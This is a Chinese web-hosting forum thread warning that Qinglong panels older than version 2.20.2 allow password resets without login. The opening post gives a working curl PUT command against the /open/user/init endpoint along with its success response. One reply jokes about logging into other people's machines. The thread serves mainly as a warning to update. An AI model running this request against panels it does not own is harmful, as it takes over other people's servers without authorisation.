全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

IP归属甄别会员请立即修改密码
查看: 1065|回复: 9
打印 上一主题 下一主题

青龙漏洞,无密码登录任意面板,赶快更新最新版。

[复制链接]
跳转到指定楼层
1#
发表于 7 天前 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本帖最后由 mn001 于 2026-3-9 06:55 编辑

只要不是最新版2.20.2,用户密码被任意修改。
执行:curl -X PUT "http://IP:5700/open/user/init" -H "Content-Type: application/json" -d '{"username": "123", "password": "123"}'
返回:
{"code":200,"message":"更新成功"}

我的刚发现被改了, 还被挂了个脚本
2#
发表于 7 天前 | 只看该作者
我暂时是不敢用了。
3#
发表于 7 天前 | 只看该作者
青龙漏洞,无密码登录任意面板,赶快更新最新版
青龙漏洞,无密码登录任意面板,赶快登录别人的机器。

点评

MSN
低情商VS高情商  发表于 6 天前
4#
 楼主| 发表于 6 天前 | 只看该作者
HOH 发表于 2026-3-8 22:38
青龙漏洞,无密码登录任意面板,赶快更新最新版
青龙漏洞,无密码登录任意面板,赶快登录别人的机 ...

理解能力超强
5#
发表于 6 天前 | 只看该作者
没暴露到外网,不用担心吧。
6#
发表于 6 天前 | 只看该作者
随便找了几个都报错
9#
 楼主| 发表于 6 天前 | 只看该作者
SpaceX 发表于 2026-3-9 08:44
随便找了几个都报错

上周开始的。大半暴露在公网的应该都已经发现了异常,然后更新了。只有个别不上心的人没更新。比如我有一台平常不咋用的就昨天刚更新。
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2026-3-15 16:29 , Processed in 0.061437 second(s), 9 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表